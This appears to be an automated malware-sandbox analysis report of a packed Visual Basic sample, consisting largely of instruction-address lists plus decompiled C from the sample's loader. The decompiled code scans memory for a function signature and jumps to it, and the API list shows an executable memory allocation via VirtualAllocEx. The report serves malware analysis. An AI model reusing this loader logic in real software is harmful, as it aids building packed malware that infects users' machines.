0x004020f7
0x004020f9
0x004020fd
0x00402100
0x00402105
0x00402107
0x0040210a
0x0040210b
0x0040210e
0x00402112
0x00402115
0x00402117
0x00402119
0x0040211b
0x0040211d
0x0040211f
0x00402121
0x00402124
0x00402127
0x0040212e
0x00402130
0x00402132
0x00402134
0x00402136
0x00402137
0x00402137
0x0040213d
0x00402140
0x00402142
0x00402143
0x00402147
0x00402149
0x0040214b
0x0040214d
0x0040214f
0x00402151
0x00402151
0x00402153
0x00402155
0x00402157
0x00402159
0x0040215b
0x0040215d
0x0040215f
0x00402161
0x00402163
0x00402165
0x00402167
0x00402169
0x0040216b
0x0040216d
0x0040216f
0x00402171
0x00402173
0x00402175
0x00402177
0x00402179
0x0040217b
0x0040217d
0x0040217f
0x00402181
0x00402183
0x00402185
0x00402187
0x00402189
0x0040218b
0x0040218d
0x0040218f
0x00402191
0x00402193
0x00402195
0x00402197
0x00402199
0x0040219b
0x0040219d
0x0040219f
0x004021a1
0x004021a3
0x004021a5
0x004021a7
0x004021a9
0x004021ab
0x004021ad
0x004021af
0x004021b1
0x004021b3
0x004021b5
0x004021b7
0x004021b9
0x004021bb
0x004021bd
0x004021bf
0x004021c1
0x004021c3
0x004021c5
0x004021cb
0x004021cd
0x004021cf
0x004021d1
0x004021d5
0x004021d7
0x004021d9
0x004021db
0x004021de
0x004021df
0x004021e2
0x004021e3
0x004021e5
0x004021e7
0x004021ed
0x004021ef
0x004021f1
0x004021f3
0x004021f5
0x004021f7
0x004021fa
0x004021fb
0x004021fd
0x004021ff
0x00402203
0x00402205
0x00402207
0x0040220a
0x0040220b
0x0040220d
0x0040220f
0x00402213
0x00402215
0x00402217
0x0040221a
0x0040221b
0x0040221d
0x0040221f
0x00402223
0x00402225
0x0040222b
0x0040222f
0x00402232
0x00402233
0x00402235
0x00402237
0x0040223e
0x0040223f
0x00402243
0x00402246
0x00402247
0x0040224a
0x0040224e
0x00402251
0x00402253
0x00402255
0x00402257
0x00402259
0x0040225b
0x0040225f
0x00402261
0x00402262
0x00402264
0x00402268
0x0040226a
0x0040226c
0x0040226e
0x00402270
0x00402274
0x00402276
0x00402277
0x0040227b
0x0040227e
0x0040227f
0x00402283
0x00402285
0x00402287
0x00402289
0x0040228b
0x0040228d
0x0040228f
0x00402291
0x00402293
0x00402295
0x00402297
0x00402299
0x0040229b
0x0040229d
0x0040229f
0x004022a1
0x004022a3
0x004022a5
0x004022a7
0x004022a9
0x004022ab
0x004022ad
0x004022af
0x004022b1
0x004022b3
0x004022b5
0x004022b7
0x004022b9
0x004022bb
0x004022bd
0x004022bf
0x004022c1
0x004022c3
0x004022c5
0x004022c7
0x004022c9
0x004022cb
0x004022cd
0x004022cf
0x004022d1
0x004022d3
0x004022d5
0x004022d7
0x004022d9
0x004022db
0x004022dd
0x004022df
0x004022e1
0x004022e3
0x004022e5
0x004022e7
0x004022e9
0x004022eb
0x004022ed
0x004022ef
0x004022f1
0x004022f3
0x004022f5
0x004022f7
0x004022f9
0x004022fb
0x004022fd
0x004022ff
0x00402301
0x00402303
0x00402306
0x00402307
0x00402309
0x0040230b
0x0040230e
0x0040230f
0x00402311
0x00402313
0x00402315
0x00402317
0x0040231a
0x0040231b
0x00402321
0x00402323
0x00402325
0x00402326
0x00402328
0x0040232a
0x0040232c
0x0040232e
0x00402330
0x00402332
0x00402334
0x00402336
0x00402337
0x00402339
0x0040233b
0x0040233e
0x0040233f
0x00402341
0x00402343
0x00402346
0x00402347
0x00402349
0x0040234b
0x00402351
0x00402353
0x00402357
0x00402357
0x00402359
0x0040235b
0x00402361
0x00402367
0x00402374
0x00402376
0x0040237b
0x0040237e
0x0040237f
0x00402382
0x00402383
0x00402386
0x0040238a
0x0040238b
0x0040238d
0x0040238f
0x00402391
0x00402393
0x00402395
0x00402397
0x00402397
0x0040239d
0x0040239e
0x004023a0
0x004023a4
0x004023a6
0x004023a8
0x004023aa
0x004023ac
0x004023af
0x004023b1
0x004023b4
0x004023b7
0x004023ba
0x004023bb
0x004023bf
0x004023c1
0x004023c3
0x004023c5
0x004023c5
0x004023c7
0x004023c9
0x004023cb
0x004023cd
0x004023cf
0x004023d1
0x004023d3
0x004023d5
0x004023d7
0x004023d9
0x004023db
0x004023dd
0x004023df
0x004023e1
0x004023e3
0x004023e5
0x004023e7
0x004023e9
0x004023eb
0x004023ed
0x004023ef
0x004023f1
0x004023f3
0x004023f5
0x004023f7
0x004023f9
0x004023fb
0x004023fd
0x004023ff
0x00402401
0x00402403
0x00402405
0x00402407
0x00402409
0x0040240b
0x0040240d
0x0040240f
0x00402411
0x00402413
0x00402415
0x00402417
0x00402419
0x0040241b
0x0040241d
0x0040241f
0x00402421
0x00402423
0x00402425
0x00402427
0x00402429
0x0040242b
0x0040242d
0x0040242f
0x00402431
0x00402433
0x00402435
0x00402437
0x00402439
0x0040243b
0x0040243d
0x00402440
0x00402441
0x00402446
0x00402448
0x0040244a
0x0040244b
0x0040244d
0x0040244f
0x00402451
0x00402455
0x00402457
0x00402459
0x0040245c
0x0040245c
0x0040245e
0x00402462
0x00402464
0x00402466
0x00402468
0x0040246a
0x0040246c
0x0040246e
0x00402473
0x00402475
0x00402477
0x0040247b
0x0040247d
0x0040247f
0x00402486
0x0040248d
0x0040248f
0x00402495
0x00402497
0x004024a7
0x004024a9
0x004024aa
0x004024ab
0x004024ad
0x004024af
0x004024b2
0x004024b7
0x004024bb
0x004024be
0x004024bf
0x004024c2
0x004024c9
0x004024cb
0x004024cd
0x004024cf
0x004024d1
0x004024d7
0x004024d9
0x004024da
0x004024e0
0x004024e2
0x004024e4
0x004024e6
0x004024ef
0x004024f3
0x004024f7
0x004024fb
0x004024fd
0x004024ff
0x00402501
0x00402503
0x00402505
0x00402507
0x00402509
0x0040250b
0x0040250d
0x0040250f
0x00402511
0x00402513
0x00402515
0x00402517
0x00402519
0x0040251b
0x0040251d
0x0040251f
0x00402521
0x00402523
0x00402525
0x00402527
0x00402529
0x0040252b
0x0040252d
0x0040252f
0x00402531
0x00402533
0x00402535
0x00402537
0x00402539
0x0040253b
0x0040253d
0x0040253f
0x00402541
0x00402543
0x00402545
0x00402547
0x00402549
0x0040254b
0x0040254d
0x0040254f
0x00402551
0x00402553
0x00402555
0x00402557
0x00402559
0x0040255b
0x0040255d
0x0040255f
0x00402561
0x00402563
0x00402565
0x00402567
0x00402569
0x0040256b
0x0040256d
0x0040256f
0x00402571
0x00402573
0x00402575
0x00402577
0x00402579
0x0040257b
0x0040257f
0x00402581
0x00402585
0x00402588
0x0040258a
0x0040258c
0x0040258e
0x00402590
0x00402593
0x0040259a
0x0040259c
0x0040259e
0x004025a0
0x004025a2
0x004025a4
0x004025a6
0x004025a8
0x004025aa
0x004025ac
0x004025b2
0x004025b5
0x004025b7
0x004025b9
0x004025bd
0x004025c2
0x004025c4
0x004025c5
0x004025ca
0x004025cc
0x004025cd
0x004025d2
0x004025d4
0x004025e1
0x004025e3
0x004025e6
0x004025e7
0x004025e9
0x004025eb
0x004025ef
0x004025f3
0x004025f7
0x004025fa
0x004025fb
0x004025fe
0x00402602
0x00402605
0x00402607
0x00402609
0x0040260b
0x0040260d
0x0040260f
0x00402611
0x00402613
0x00402615
0x00402616
0x00402618
0x0040261c
0x0040261e
0x00402620
0x00402622
0x00402624
0x0040262b
0x0040262f
0x00402633
0x00402637
0x00402639
0x0040263b
0x0040263d
0x0040263f
0x00402641
0x00402643
0x00402645
0x00402647
0x00402649
0x0040264b
0x0040264d
0x0040264f
0x00402651
0x00402653
0x00402655
0x00402657
0x00402659
0x0040265b
0x0040265d
0x0040265f
0x00402661
0x00402663
0x00402665
0x00402667
0x00402669
0x0040266b
0x0040266d
0x0040266f
0x00402671
0x00402673
0x00402675
0x00402677
0x00402679
0x0040267b
0x0040267d
0x0040267f
0x00402681
0x00402683
0x00402685
0x00402687
0x00402689
0x0040268b
0x0040268d
0x0040268f
0x00402691
0x00402693
0x00402695
0x00402697
0x00402699
0x0040269b
0x0040269d
0x0040269f
0x004026a1
0x004026a3
0x004026a5
0x004026a7
0x004026a9
0x004026ab
0x004026ad
0x004026af
0x004026b1
0x004026b3
0x004026b5
0x004026b7
0x004026bb
0x004026bd
0x004026bf
0x004026c5
0x004026c7
0x004026c9
0x004026cd
0x004026d1
0x004026d4
0x004026d6
0x004026d8
0x004026dc
0x004026de
0x004026e0
0x004026e2
0x004026e4
0x004026e6
0x004026eb
0x004026ed
0x004026f1
0x004026f2
0x004026f3
0x004026f5
0x004026f7
0x004026fa
0x004026fb
0x004026fd
0x004026ff
0x00402702
0x00402703
0x00402705
0x00402707
0x00402709
0x0040270a
0x0040270b
0x0040270d
0x0040270f
0x00402712
0x00402713
0x00402715
0x0040271b
0x0040271f
0x00402722
0x00402723
0x00402725
0x00402729
0x0040272c
0x00402731
0x00402732
0x00402733
0x00402736
0x00402737
0x0040273a
0x0040273e
0x00402741
0x00402743
0x00402745
0x00402747
0x00402749
0x0040274b
0x0040274f
0x00402751
0x00402752
0x00402754
0x00402754
0x00402758
0x0040275a
0x0040275c
0x0040275e
0x00402763
0x0040276b
0x0040276e
0x0040276f
0x00402773
0x00402775
0x00402777
0x00402779
0x0040277b
0x0040277d
0x0040277f
0x00402781
0x00402783
0x00402785
0x00402787
0x00402789
0x0040278b
0x0040278d
0x0040278f
0x00402791
0x00402793
0x00402795
0x00402797
0x00402799
0x0040279b
0x0040279d
0x0040279f
0x004027a1
0x004027a3
0x004027a5
0x004027a7
0x004027a9
0x004027ab
0x004027ad
0x004027af
0x004027b1
0x004027b3
0x004027b5
0x004027b7
0x004027b9
0x004027bb
0x004027bd
0x004027bf
0x004027c1
0x004027c3
0x004027c5
0x004027c7
0x004027c9
0x004027cb
0x004027cd
0x004027cf
0x004027d1
0x004027d3
0x004027d5
0x004027d7
0x004027d9
0x004027db
0x004027dd
0x004027df
0x004027e1
0x004027e3
0x004027e5
0x004027e7
0x004027e9
0x004027eb
0x004027ed
0x004027ef
0x004027f1
0x004027f3
0x004027f6
0x004027f7
0x004027f9
0x004027fb
0x004027fd
0x004027ff
0x00402801
0x00402803
0x00402805
0x00402809
0x0040280e
0x0040280f
0x00402811
0x00402813
0x00402813
0x00402816
0x00402818
0x0040281a
0x0040281c
0x0040281e
0x00402820
0x00402822
0x00402824
0x00402829
0x0040282b
0x00402832
0x00402834
0x00402839
0x0040283b
0x0040283e
0x0040283f
0x00402841
0x00402843
0x00402847
0x00402849
0x0040284b
0x0040284e
0x0040284f
0x00402851
0x00402857
0x00402859
0x0040285c
0x0040285e
0x0040285f
0x00402861
0x00402865
0x00402867
0x0040286e
0x0040286f
0x00402872
0x00402877
0x0040287b
0x0040287d
0x0040287f
0x00402881
0x00402883
0x00402885
0x00402887
0x00402889
0x00402889
0x0040288c
0x004028e8
0x004028e8
0x004028ea
0x004028ec
0x0040288e
0x0040288e
0x00402898
0x00402899
0x0040289b
0x0040289d
0x0040289f
0x004028a6
0x004028a8
0x004028aa
0x004028ac
0x004028ae
0x004028b2
0x004028b3
0x004028b5
0x004028b6
0x004028b8
0x004028b8
0x004028bc
0x004028be
0x004028c0
0x004028c2
0x004028c4
0x004028c9
0x004028ca
0x004028cb
0x004028cf
0x004028d2
0x004028d3
0x004028d7
0x004028d9
0x004028db
0x004028dd
0x004028df
0x004028e1
0x004028e3
0x004028e5
0x004028e7
0x00000000
0x004028e7
0x004028c4
0x004028ee
0x004028f0
0x004028f2
0x004028f4
0x004028f6
0x004028f8
0x004028fa
0x004028fc
0x004028fe
0x00402900
0x00402902
0x00402904
0x00402906
0x00402908
0x0040290a
0x0040290c
0x0040290e
0x00402910
0x00402911
0x00402914
0x00402916
0x00402917
0x0040291b
0x0040291e
0x0040291f
0x00402923
0x00402925
0x00402927
0x00402929
0x0040292b
0x0040292d
0x0040292f
0x00402931
0x00402933
0x00402935
0x00402937
0x00402939
0x0040293b
0x0040293d
0x0040293f
0x00402941
0x00402943
0x00402945
0x00402947
0x00402949
0x0040294b
0x0040294d
0x0040294f
0x00402951
0x00402953
0x00402955
0x00402957
0x00402959
0x0040295b
0x0040295d
0x0040295f
0x00402961
0x00402963
0x00402965
0x00402967
0x00402969
0x0040296b
0x0040296d
0x0040296f
0x00402971
0x00402973
0x00402975
0x00402977
0x00402979
0x0040297b
0x0040297d
0x0040297f
0x00402981
0x00402983
0x00402985
0x00402987
0x00402989
0x0040298b
0x0040298d
0x0040298f
0x00402991
0x00402993
0x00402995
0x00402997
0x00402999
0x0040299b
0x0040299d
0x0040299f
0x004029a1
0x004029a3
0x004029a6
0x004029a7
0x004029a9
0x004029ab
0x004029ae
0x004029af
0x004029b3
0x004029b6
0x004029b8
0x004029ba
0x004029bb
0x004029c1
0x004029c4
0x004029c6
0x004029c8
0x004029ca
0x004029cc
0x004029ce
0x004029d0
0x004029d2
0x004029d4
0x004029d6
0x004029d8
0x004029da
0x004029dc
0x004029de
0x004029e0
0x004029e2
0x004029e4
0x004029e6
0x004029e8
0x004029ea
0x004029ec
0x004029ee
0x004029f0
0x004029f2
0x004029f4
0x004029f6
0x004029f8
0x004029fa
0x004029fc
0x004029fe
0x00402a00
0x00402a02
0x00402a04
0x00402a06
0x00402a08
0x00402a0a
0x00402a0c
0x00402a0e
0x00402a10
0x00402a12
0x00402a14
0x00402a16
0x00402a18
0x00402a1a
0x00402a1c
0x00402a1e
0x00402a20
0x00402a22
0x00402a24
0x00402a26
0x00402a28
0x00402a2a
0x00402a2c
0x00402a2e
0x00402a30
0x00402a32
0x00402a34
0x00402a36
0x00402a38
0x00402a3a
0x00402a3c
0x00402a3e
0x00402a40
0x00402a42
0x00402a44
0x00402a46
0x00402a48
0x00402a4a
0x00402a4c
0x00402a4e
0x00402a50
0x00402a52
0x00402a54
0x00402a56
0x00402a58
0x00402a5a
0x00402a5c
0x00402a5e
0x00402a60
0x00402a62
0x00402a64
0x00402a66
0x00402a68
0x00402a6a
0x00402a6c
0x00402a6e
0x00402a70
0x00402a72
0x00402a74
0x00402a76
0x00402a78
0x00402a7a
0x00402a7c
0x00402a7e
0x00402a80
0x00402a82
0x00402a84
0x00402a86
0x00402a88
0x00402a8a
0x00402a8c
0x00402a8e
0x00402a90
0x00402a92
0x00402a94
0x00402a96
0x00402a98
0x00402a9a
0x00402a9c
0x00402a9e
0x00402aa0
0x00402aa2
0x00402aa4
0x00402aa6
0x00402aa8
0x00402aaa
0x00402aac
0x00402aae
0x00402ab0
0x00402ab2
0x00402ab4
0x00402ab6
0x00402ab8
0x00402aba
0x00402abc
0x00402abe
0x00402ac0
0x00402ac2
0x00402ac4
0x00402ac6
0x00402ac8
0x00402aca
0x00402acc
0x00402ace
0x00402ad0
0x00402ad2
0x00402ad4
0x00402ad6
0x00402ad8
0x00402ada
0x00402adc
0x00402ade
0x00402ae0
0x00402ae2
0x00402ae4
0x00402ae6
0x00402ae8
0x00402aea
0x00402aec
0x00402aee
0x00402af0
0x00402af2
0x00402af4
0x00402af6
0x00402af8
0x00402afa
0x00402afc
0x00402afe
0x00402b00
0x00402b02
0x00402b04
0x00402b06
0x00402b08
0x00402b0a
0x00402b0c
0x00402b0e
0x00402b10
0x00402b12
0x00402b14
0x00402b16
0x00402b18
0x00402b1a
0x00402b1c
0x00402b1e
0x00402b20
0x00402b22
0x00402b24
0x00402b26
0x00402b28
0x00402b2a
0x00402b2c
0x00402b2e
0x00402b30
0x00402b32
0x00402b34
0x00402b36
0x00402b38
0x00402b3a
0x00402b3c
0x00402b3e
0x00402b40
0x00402b42
0x00402b44
0x00402b46
0x00402b48
0x00402b4a
0x00402b4c
0x00402b4e
0x00402b50
0x00402b52
0x00402b54
0x00402b56
0x00402b58
0x00402b5a
0x00402b5c
0x00402b5e
0x00402b60
0x00402b62
0x00402b64
0x00402b66
0x00402b68
0x00402b6a
0x00402b6c
0x00402b6e
0x00402b70
0x00402b72
0x00402b74
0x00402b76
0x00402b78
0x00402b7a
0x00402b7c
0x00402b7e
0x00402b80
0x00402b82
0x00402b84
0x00402b86
0x00402b88
0x00402b8a
0x00402b8c
0x00402b8e
0x00402b90
0x00402b92
0x00402b94
0x00402b96
0x00402b98
0x00402b9a
0x00402b9c
0x00402b9e
0x00402ba0
0x00402ba2
0x00402ba4
0x00402ba6
0x00402ba8
0x00402baa
0x00402bac
0x00402bae
0x00402bb0
0x00402bb2
0x00402bb4
0x00402bb6
0x00402bb8
0x00402bba
0x00402bbc
0x00402bbe
0x00402bc0
0x00402bc2
0x00402bc4
0x00402bc6
0x00402bc8
0x00402bca
0x00402bcc
0x00402bce
0x00402bd0
0x00402bd2
0x00402bd4
0x00402bd7
0x00402bd9
0x00402bdb
0x00402bdd
0x00402bdf
0x00402be2
0x00402be3
0x00402be5
0x00402be7
0x00402be9
0x00402bea
0x00402beb
0x00402bed
0x00402bef
0x00402bf1
0x00402bf3
0x00402bfa
0x00402bfb
0x00402bfd
0x00402bff
0x00402c03
0x00402c05
0x00402c07
0x00402c09
0x00402c0b
0x00402c0d
0x00402c0f
0x00402c13
0x00402c15
0x00402c17
0x00402c1a
0x00402c1b
0x00402c1d
0x00402c1f
0x00402c23
0x00402c25
0x00402c27
0x00402c2b
0x00402c2d
0x00402c2f
0x00402c32
0x00402c33
0x00402c35
0x00402c37
0x00402c3b
0x00402c3d
0x00402c43
0x00402c47
0x00402c49
0x00402c4e
0x00402c50
0x00402c52
0x00402c54
0x00402c56
0x00402c58
0x00402c5a
0x00402c5c
0x00402c60
0x00402c62
0x00402c63
0x00402c66
0x00402c67
0x00402c6a
0x00402c6e
0x00402c6f
0x00402c71
0x00402c73
0x00402c75
0x00402c77
0x00402c79
0x00402c7b
0x00402c7e
0x00402c7f
0x00402c81
0x00402c82
0x00402c84
0x00402c84
0x00402c88
0x00402c8a
0x00402c8c
0x00402c8d
0x00402c8f
0x00402c92
0x00402c94
0x00402c96
0x00402c97
0x00402c99
0x00402c9b
0x00402c9b
0x00402c9c
0x00402c9e
0x00402ca0
0x00402ca2
0x00402ca4
0x00402ca5
0x00402caa
0x00402cae
0x00402caf
0x00402cb1
0x00402cb3
0x00402cb6
0x00402cb9
0x00402cbb
0x00402cc2
0x00402cc4
0x00402cc6
0x00402cc8
0x00402cca
0x00402ccd
0x00402ccf
0x00402cd1
0x00402cd2
0x00402cdc
0x00402cdd
0x00402cdf
0x00402ce2
0x00402cea
0x00402cec
0x00402cee
0x00402cf0
0x00402cf2
0x00402cf4
0x00402cf5
0x00402cf7
0x00402cf7
0x00402cfa
0x00402cfc
0x00402d04
0x00402d05
0x00402d07
0x00402d0b
0x00402d0f
0x00402d15
0x00402d17
0x00402d19
0x00402d1b
0x00402d1e
0x00402d1f
0x00402d1f
0x00402d1f
0x00402d22
0x00402d24
0x00402d26
0x00402d27
0x00402d2d
0x00402d2f
0x00402d32
0x00402d34
0x00402d36
0x00402d37
0x00402d39
0x00402d3b
0x00402d3d
0x00402d3f
0x00402d41
0x00402d43
0x00402d47
0x00402d47
0x00402d4a
0x00402d59
0x00402d5a
0x00402d5b
0x00402d5b
0x00402d61
0x00402d63
0x00402d69
0x00402d6c
0x00402d6f
0x00402d72
0x00402d73
0x00402d77
0x00402d79
0x00402d7b
0x00402d7d
0x00402d7d
0x00402d7f
0x00402d81
0x00402d83
0x00402d85
0x00402d87
0x00402d89
0x00402d8b
0x00402d8d
0x00402d8f
0x00402d91
0x00402d93
0x00402d95
0x00402d97
0x00402d99
0x00402d9b
0x00402d9d
0x00402d9f
0x00402da1
0x00402da3
0x00402da5
0x00402da7
0x00402da9
0x00402dab
0x00402dad
0x00402daf
0x00402db1
0x00402db3
0x00402db5
0x00402db7
0x00402db9
0x00402dbb
0x00402dbd
0x00402dbf
0x00402dc1
0x00402dc3
0x00402dc5
0x00402dc7
0x00402dc9
0x00402dcb
0x00402dcd
0x00402dcf
0x00402dd5
0x00402dd6
0x00402dd7
0x00402dd9
0x00402ddb
0x00402ddd
0x00402ddf
0x00402de1
0x00402de3
0x00402de5
0x00402de7
0x00402de9
0x00402deb
0x00402ded
0x00402def
0x00402df1
0x00402df3
0x00402df5
0x00402df7
0x00402dfe
0x00402dff
0x00402e03
0x00402e06
0x00402e07
0x00402e0b
0x00402e0d
0x00402e0f
0x00402e11
0x00402e13
0x00402e15
0x00402e17
0x00402e19
0x00402e1b
0x00402e1d
0x00402e1f
0x00402e21
0x00402e23
0x00402e25
0x00402e27
0x00402e29
0x00402e2b
0x00402e2d
0x00402e2f
0x00402e31
0x00402e33
0x00402e35
0x00402e37
0x00402e39
0x00402e3b
0x00402e3d
0x00402e3f
0x00402e41
0x00402e43
0x00402e45
0x00402e47
0x00402e49
0x00402e4b
0x00402e52
0x00402e53
0x00402e57
0x00402e5a
0x00402e5b
0x00402e5f
0x00402e61
0x00402e63
0x00402e65
0x00402e67
0x00402e69
0x00402e6b
0x00402e6d
0x00402e6f
0x00402e71
0x00402e73
0x00402e75
0x00402e77
0x00402e79
0x00402e7b
0x00402e7d
0x00402e7f
0x00402e81
0x00402e83
0x00402e85
0x00402e87
0x00402e89
0x00402e8b
0x00402e8d
0x00402e8f
0x00402e91
0x00402e93
0x00402e95
0x00402e97
0x00402e99
0x00402e9b
0x00402e9d
0x00402e9f
0x00402ea1
0x00402ea3
0x00402ea5
0x00402ea7
0x00402ea9
0x00402eab
0x00402ead
0x00402eb5
0x00402eb8
0x00402ebb
0x00402ebe
0x00402ebf
0x00402ec3
0x00402ec5
0x00402ec7
0x00402ec9
0x00402ec9
0x00402ecb
0x00402ecd
0x00402ecf
0x00402ed1
0x00402ed3
0x00402ed5
0x00402ed7
0x00402ed9
0x00402edb
0x00402edd
0x00402edf
0x00402ee1
0x00402ee3
0x00402ee5
0x00402ee7
0x00402ee9
0x00402eeb
0x00402eed
0x00402eef
0x00402ef1
0x00402ef3
0x00402ef5
0x00402ef7
0x00402ef9
0x00402efb
0x00402efd
0x00402eff
0x00402f01
0x00402f03
0x00402f05
0x00402f07
0x00402f09
0x00402f0b
0x00402f0d
0x00402f0f
0x00402f11
0x00402f13
0x00402f15
0x00402f17
0x00402f19
0x00402f1b
0x00402f1d
0x00402f1f
0x00402f21
0x00402f23
0x00402f25
0x00402f27
0x00402f2e
0x00402f2f
0x00402f33
0x00402f36
0x00402f37
0x00402f3b
0x00402f3d
0x00402f3f
0x00402f41
0x00402f43
0x00402f45
0x00402f47
0x00402f49
0x00402f4b
0x00402f4d
0x00402f4f
0x00402f51
0x00402f53
0x00402f55
0x00402f57
0x00402f59
0x00402f5b
0x00402f5d
0x00402f5f
0x00402f61
0x00402f63
0x00402f65
0x00402f67
0x00402f69
0x00402f6b
0x00402f6d
0x00402f6f
0x00402f71
0x00402f73
0x00402f75
0x00402f77
0x00402f79
0x00402f7b
0x00402f7d
0x00402f7f
0x00402f86
0x00402f87
0x00402f8b
0x00402f8e
0x00402f8f
0x00402f93
0x00402f95
0x00402f97
0x00402f98
0x00421847
0x00421856
0x00421862
0x00421865
0x00421872
0x00421875
0x00421879
0x0042187f
0x00421882
0x00421889
0x0042188f
0x0042189a
0x004218a3

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040118D

Strings

VB5!6&*, xrefs: 00401398, 00401188

Memory Dump Source

Source File: 0000000A.00000002.689859187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.689855403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.689873308.0000000000421000.00000020.00020000.sdmp Download File
Associated: 0000000A.00000002.689876932.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.689880429.000000000042A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.689883984.000000000042B000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 4a94630f9d0ed2b473fe86552282cdef1b35c16a5982df7e594d711faab5adad
Instruction ID: 0ecceb6ba8861c98b4905b6d7a9acf2819b5a44605d6637ecb7ff1070faad8e2
Opcode Fuzzy Hash: 4a94630f9d0ed2b473fe86552282cdef1b35c16a5982df7e594d711faab5adad
Instruction Fuzzy Hash: C6B1006244E3C18FD7138B704DA55917FB0AE2321471E84EBC8C1DF4B3E22DA95AC76A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C292, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E0041C292(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __fp0) {
				void* _t14;
				void* _t15;
				void* _t16;
				intOrPtr* _t17;
				void* _t18;
				void* _t19;
				void* _t58;
				void* _t59;
				void* _t61;
				signed int _t62;
				void* _t63;
				void* _t65;
				void* _t82;
				signed int _t85;
				void* _t92;

				_t92 = __fp0;
				_t61 = __edx;
				_t58 = __ecx;
				_t47 = __ebx;
				_t14 =  *((intOrPtr*)(__ebx + 0x68))();
				asm("gs insb");
				asm("insb");
				_pop(_t63);
				_t65 = __esi - 1;
				asm("outsd");
				if(_t65 == 0) {
					 *(_t82 - 0x70) =  *(_t82 - 0x70) | _t85;
					_t62 = _t85;
					L12();
					 *_t85 =  *_t85 + 0x44fff; // executed
					_t15 = HeapCreate(1, 0, 0); // executed
					 *(_t82 + 8) = _t15;
					_t59 = _t63;
					_t16 = L0041C326(_t47, _t59, _t63, _t65, __eflags, _t92);
					_push(_t16);
					_t17 = _t16 - 1;
					__eflags = _t17;
					asm("popad");
					if(_t17 >= 0) {
						asm("insb");
						asm("insb");
						asm("outsd");
						asm("arpl [eax], ax");
						__eflags =  &__imp___CIcos;
						goto L13;
						do {
							do {
								do {
									L13:
									asm("lodsd");
									__eflags = _t17;
								} while (_t17 == 0);
								__eflags =  *_t17 - 0xffffffff83ec8b55;
							} while ( *_t17 != 0xffffffff83ec8b55);
							__eflags =  *((intOrPtr*)(_t17 + 4)) - 0xffffffff8d560cec;
						} while ( *((intOrPtr*)(_t17 + 4)) != 0xffffffff8d560cec);
						 *_t85 =  *_t85 + 0x44ffe;
						__eflags =  *_t85;
						_t18 =  *_t17(_t85, _t59, _t62, 2, _t85, 0, 0, 0); // executed
						return _t18;
					}
					return _t17;
				} else {
					asm("o16 jns 0x4c");
					asm("arpl [edi+0x6e], bp");
					 *((intOrPtr*)(_t14 - 1)) =  *((intOrPtr*)(_t14 - 1)) + __ebx;
					_t19 = _t63;
					_push( *((intOrPtr*)(_t82 + 0x52)));
				}
			}

0x0041c292
0x0041c292
0x0041c292
0x0041c292
0x0041c292
0x0041c295
0x0041c297
0x0041c298
0x0041c299
0x0041c29a
0x0041c29b
0x0041c306
0x0041c309
0x0041c30b
0x0041c316
0x0041c31d
0x0041c31f
0x0041c322
0x0041c365
0x0041c36a
0x0041c36b
0x0041c36b
0x0041c36c
0x0041c36e
0x0041c370
0x0041c371
0x0041c372
0x0041c373
0x0041c377
0x0041c377
0x0041c37d
0x0041c37d
0x0041c37d
0x0041c37d
0x0041c37d
0x0041c37e
0x0041c37e
0x0041c38a
0x0041c38a
0x0041c395
0x0041c395
0x0041c3a2
0x0041c3a2
0x0041c3ac
0x00000000
0x0041c3ae
0x0041c3b1
0x0041c29d
0x0041c29d
0x0041c2a0
0x0041c2a4
0x0041c2a5
0x0041c2a6
0x0041c2a6

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 0041C2AB
HeapCreate.KERNELBASE ref: 0041C31D

Strings

KERNEL32, xrefs: 0041C3B7

Memory Dump Source

Source File: 0000000A.00000002.689859187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.689855403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.689873308.0000000000421000.00000020.00020000.sdmp Download File
Associated: 0000000A.00000002.689876932.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.689880429.000000000042A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.689883984.000000000042B000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeapIconNotifyShell_
String ID: KERNEL32
API String ID: 2522922933-1217789123
Opcode ID: 1abacec55dd53c80b93eb16ec5708ea5ba95e1cb9cd8f259d6c29ad18bc844ed
Instruction ID: f6c9b3eb452472eef71d767f4126e5e32674215b3af36093e748069e1370d963
Opcode Fuzzy Hash: 1abacec55dd53c80b93eb16ec5708ea5ba95e1cb9cd8f259d6c29ad18bc844ed
Instruction Fuzzy Hash: F2113BA6528D342BF530A0B83C648DBB70CCE932B43522B4BFE50D10C0CA2549D385FD

Uniqueness

Uniqueness Score: -1.00%

Function 04B20387, Relevance: 3.4, APIs: 2, Instructions: 380memoryCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(04B203B7,?,?,00000100), ref: 04B20392
VirtualAllocEx.KERNELBASE(000000FF,00000000,08000000,00003000,00000040), ref: 04B203D9

Memory Dump Source

Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false

Similarity

API ID: AllocEnumVirtualWindows
String ID:
API String ID: 1323281959-0
Opcode ID: ff10654bd0f38353a7d4d8b819bc58430c397877d55b13b1621c9b14c0716bae
Instruction ID: 46b5077d49e3fb3d340d179f8b609f0b5126980b627cbbb860aaea8055ddb6d7
Opcode Fuzzy Hash: ff10654bd0f38353a7d4d8b819bc58430c397877d55b13b1621c9b14c0716bae
Instruction Fuzzy Hash: 0EF1692D7091918FCBA5DF25A8D8DD0BF309B8E211B486089C9AA97717E3242517DFB2

Uniqueness

Uniqueness Score: -1.00%

Function 00402FB2, Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00402FB2(void* __eax, intOrPtr _a4) {

				_a4 = _a4 - 0xffff;
